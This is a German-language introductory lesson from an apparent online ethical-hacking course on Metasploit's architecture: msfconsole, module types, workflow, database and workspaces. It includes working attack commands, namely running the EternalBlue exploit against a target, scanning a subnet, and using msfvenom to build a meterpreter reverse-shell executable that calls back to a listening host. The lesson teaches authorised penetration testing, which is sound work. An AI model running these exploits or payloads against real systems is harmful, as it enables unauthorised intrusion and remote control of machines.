Metasploit-Architektur
Module und Konsole
Metasploit-Architektur ist eine kostenlose Ethical Hacking Academy-Lektion auf CoddyKit. Dies ist Lektion 1 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Ethical Hacking Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Ethical Hacking Academy-Kurs umfasst insgesamt 4 Lektionen.
Was ist Metasploit?
Metasploit ist das am weitesten verbreitete Exploitation-Framework. Es bietet eine strukturierte Bibliothek aus Exploits, Payloads und Tools, um Schwachstellen in autorisierten Einsätzen zu testen und zu demonstrieren.
Statt jeden Angriff von Grund auf selbst zu schreiben, laden Sie bewährte Module, konfigurieren sie und führen sie über eine einheitliche Benutzeroberfläche aus.
msfconsole
Die wichtigste Benutzeroberfläche ist msfconsole, eine interaktive Kommandozeilen-Shell. Sie bietet Tab-Vervollständigung, eine Befehlshistorie und Zugriff auf jedes Modul.
Sie starten sie in einem Terminal und arbeiten anschließend vollständig innerhalb ihrer Eingabeaufforderung.
msfconsole
# msf6 > helpModultypen
Metasploit organisiert seine Funktionen in Modultypen:
- exploit: Code, der eine Schwachstelle ausnutzt.
- payload: Code, der nach der erfolgreichen Ausnutzung auf dem Ziel ausgeführt wird.
- auxiliary: Scanner, Fuzzer und Tools, die keinen Payload ausliefern.
- post: Aktionen nach der Kompromittierung eines Hosts.
- encoder und nop: Unterstützen Payloads dabei, einer Erkennung zu entgehen.
Modulbenennung
Module verwenden einen hierarchischen Pfad, der genau angibt, was sie tun. Anhand des Pfads erkennen Sie Typ, Plattform und Zieldienst.
exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploitExploits und Payloads
Eine wichtige Unterscheidung:
- Der Exploit ist der Weg hinein; er bringt die verwundbare Software aus dem Gleichgewicht.
- Der Payload legt fest, was geschehen soll, sobald Sie Zugriff haben, beispielsweise das Öffnen einer Shell.
Sie kombinieren beide: Ein Exploit kann abhängig von Ihrem Ziel und dem Zielsystem viele verschiedene Payloads ausliefern.
Der Modul-Workflow
Die Arbeit mit jedem Modul folgt einem wiederholbaren Ablauf:
- Mit search nach einem Modul suchen.
- Mit use das Modul laden.
- Optionen wie RHOSTS und LHOST festlegen.
- Mit run oder exploit ausführen.
Diese Einheitlichkeit ermöglicht es dem Framework, mit Tausenden von Modulen zu arbeiten.
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploitDatastore und Optionen
Die Moduleinstellungen befinden sich im Datastore. Jede Option kann erforderlich oder optional sein.
- RHOSTS: Adresse(n) des entfernten Ziels.
- RPORT: entfernter Port.
- LHOST: Ihre Listening-Adresse für Reverse-Verbindungen.
- LPORT: Ihr Listening-Port.
Verwenden Sie show options, um vor der Ausführung zu sehen, was ein Modul benötigt.
Die Datenbank
Metasploit lässt sich in eine PostgreSQL-Datenbank integrieren, um während eines Einsatzes entdeckte Hosts, Dienste, Beute und Zugangsdaten zu speichern. So können Sie einen großen Umfang effizient nachverfolgen.
Starten Sie die Datenbank, bevor Sie die Konsole öffnen, damit Ergebnisse automatisch aufgezeichnet werden.
msfdb init
# Inside msfconsole:
# db_status hosts services credsAuxiliary-Module
Auxiliary-Module erledigen nützliche Aufgaben, ohne Systeme auszunutzen: Port-Scanning, Dienstaufzählung, Brute-Force-Anmeldeversuche und Fuzzing.
Sie sind häufig der erste Schritt, da sie die Informationen sammeln, die Sie vor der Auswahl eines Exploits benötigen.
use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
runmsfvenom
msfvenom ist ein Begleittool zum Erzeugen eigenständiger Payloads als Dateien: ausführbare Dateien, Skripte oder Shellcode, die Sie außerhalb der Konsole bereitstellen.
Es kombiniert die Payload-Erzeugung und das Encoding in einem Befehl und eignet sich für Phishing-Simulationen oder die individuelle Bereitstellung in autorisierten Tests.
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exeArbeitsbereiche
Bei mehreren Einsätzen halten Metasploit-Arbeitsbereiche die Hosts, Dienste und Beute jedes Kunden in der Datenbank getrennt. Sie wechseln zwischen ihnen, damit keine Daten zwischen Bewertungen übertragen werden.
workspace -a clientA # add a workspace
workspace clientA # switch to it
workspace # list allKurztest
Testen Sie Ihr Verständnis der Modultypen.
Zusammenfassung
Sie haben die Architektur von Metasploit kennengelernt:
- msfconsole ist die Hauptschnittstelle; msfvenom erstellt eigenständige Payloads.
- Modultypen: exploit, payload, auxiliary, post, encoder/nop.
- Modulpfade codieren Typ, Plattform und Dienst.
- Workflow: search, use, set options, run; Einstellungen befinden sich im Datastore.
- Die PostgreSQL-Datenbank erfasst Hosts, Dienste und Beute.
Als Nächstes geht es darum, Exploits effektiv zu suchen und einzusetzen.
Häufig gestellte Fragen
Ist die Lektion „Metasploit-Architektur“ kostenlos?
Ja — der vollständige Text von „Metasploit-Architektur“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Ethical Hacking Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Ethical Hacking Academy-Kurs umfasst insgesamt 4 Lektionen.
Was lerne ich in „Metasploit-Architektur“?
Module und Konsole Du übst Ethical Hacking Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.
Brauche ich Erfahrung, um Ethical Hacking Academy zu starten?
Keine Vorkenntnisse erforderlich. Ethical Hacking Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 1 von 4.
Wie lange dauert die Lektion „Metasploit-Architektur“?
Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.
Kann ich in dieser Ethical Hacking Academy-Lektion Code schreiben und ausführen?
Ja. Jede Ethical Hacking Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.
Alle Lektionen in diesem Kurs
- Metasploit-Architektur
- Exploits suchen und verwenden
- Payloads und Meterpreter
- Post-Exploitation-Module